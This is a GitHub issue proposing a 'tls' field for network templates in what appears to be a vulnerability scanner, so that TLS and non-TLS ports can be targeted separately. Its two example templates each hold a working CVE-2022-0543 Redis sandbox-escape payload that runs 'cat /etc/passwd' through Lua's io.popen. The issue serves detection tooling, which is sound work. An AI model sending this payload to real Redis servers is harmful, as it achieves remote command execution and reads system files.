Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

TLS related enhancements in network protocol #4431

Open
tarunKoyalwar opened this issue Nov 27, 2023 · 0 comments
Open

TLS related enhancements in network protocol #4431

tarunKoyalwar opened this issue Nov 27, 2023 · 0 comments
Labels
Type: Discussion Some ideas need to be planned and disucssed to come to a strategy. Type: Enhancement Most issues will probably ask for additions or changes.

Comments

@tarunKoyalwar
Copy link
Member

Context

  • Introduction of port field in network protocol fixed issue related to redundant dials to some hosts when input contains 80,443 ports in url and also reduced warnings generated due to closed port (ref:Input handling for network templates #3902)
  • But this change did not mitigate the issue completely when service has a tls and non-tls port like below example
id: CVE-2022-0543

info:
  name: Redis Sandbox Escape - Remote Code Execution
  author: dwisiswant0
  severity: critical
  tags: cve,cve2022,network,redis,unauth,rce,kev

tcp:
  - host:
      - "{{Hostname}}"
      - "tls://{{Hostname}}"
    port: 6379

    inputs:
      - data: "eval 'local io_l = package.loadlib(\"/usr/lib/x86_64-linux-gnu/liblua5.1.so.0\", \"luaopen_io\"); local io = io_l(); local f = io.popen(\"cat /etc/passwd\", \"r\"); local res = f:read(\"*a\"); f:close(); return res' 0\r\n"
    read-size: 64

    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

In this example two dials will be made one to {{Hostname}}:6379 and other to tls://{{Hostname}}:6379 which is not correct since tls port is 6380 and not 6379
adding two values in port field like port: 6379,6380 will send total of 4 dials to host which is also not correct

Proposed Solution

  • The simples solution seems to be adding a new field tls in network protocol to specify tls related customization. the final network protocol will look like below
id: CVE-2022-0543

info:
  name: Redis Sandbox Escape - Remote Code Execution
  author: dwisiswant0
  severity: critical
  tags: cve,cve2022,network,redis,unauth,rce,kev

tcp:
  - host:
      - "{{Hostname}}"
    port: 6379

    tls:
      port: 6380
      version: tls12
      cipher-suites:
        - TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
        - TLS_AES_128_CCM_SHA256
      mode: ztls
      # other tls related customization  from tlsx like client certificates etc


    inputs:
      - data: "eval 'local io_l = package.loadlib(\"/usr/lib/x86_64-linux-gnu/liblua5.1.so.0\", \"luaopen_io\"); local io = io_l(); local f = io.popen(\"cat /etc/passwd\", \"r\"); local res = f:read(\"*a\"); f:close(); return res' 0\r\n"
    read-size: 64

    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

this will work like a pitchfork where port field will be used for non-tls connection and tls.port field will be used for tls connection
the meaning of port field will not change in this context and will also comma seperated values like port: 22,2222 as introduced in recent release
@tarunKoyalwar tarunKoyalwar added Type: Enhancement Most issues will probably ask for additions or changes. Type: Discussion Some ideas need to be planned and disucssed to come to a strategy. labels Nov 27, 2023
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
Type: Discussion Some ideas need to be planned and disucssed to come to a strategy. Type: Enhancement Most issues will probably ask for additions or changes.
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@tarunKoyalwar